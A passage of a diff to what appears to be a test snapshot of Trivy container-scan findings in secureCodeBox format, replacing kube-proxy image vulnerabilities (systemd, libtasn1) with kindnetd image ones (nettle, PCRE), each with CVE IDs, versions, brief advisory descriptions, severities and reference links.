[ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20305", + "installedVersion": "3.4.1-1", + "packageName": "libnettle6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "https://access.redhat.com/security/cve/CVE-2021-20305", + "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "https://linux.oracle.com/cve/CVE-2021-20305.html", + "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "https://security.gentoo.org/glsa/202105-31", + "https://security.netapp.com/advisory/ntap-20211022-0002/", + "https://ubuntu.com/security/notices/USN-4906-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "https://www.debian.org/security/2021/dsa-4933", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "nettle: Out of bounds memory access in signature verification", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://avd.aquasec.com/nvd/cve-2021-20305", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://access.redhat.com/security/cve/CVE-2021-20305", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://security.gentoo.org/glsa/202105-31", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://ubuntu.com/security/notices/USN-4906-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.debian.org/security/2021/dsa-4933", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3580", + "installedVersion": "3.4.1-1", + "packageName": "libnettle6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "https://access.redhat.com/security/cve/CVE-2021-3580", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://linux.oracle.com/cve/CVE-2021-3580.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "https://security.netapp.com/advisory/ntap-20211104-0006/", + "https://ubuntu.com/security/notices/USN-4990-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3580", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2021-3580", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://access.redhat.com/security/cve/CVE-2021-3580", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4990-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-14155", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", + "https://access.redhat.com/security/cve/CVE-2020-14155", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2020-14155.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", + "https://security.netapp.com/advisory/ntap-20221028-0010/", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2020-14155", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "pcre: Integer overflow when parsing callout numeric arguments", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://avd.aquasec.com/nvd/cve-2020-14155", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://access.redhat.com/security/cve/CVE-2020-14155", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", - ], - }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://linux.oracle.com/cve/CVE-2020-14155.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://security.netapp.com/advisory/ntap-20221028-0010/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-14155", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.pcre.org/original/changelog.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "4.16.0-2+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.16.0-2", - "packageName": "libtasn1-6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://bugs.gentoo.org/866237", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", + "references": [ + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", + "references": [ { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, { "type": "URL", - "value": 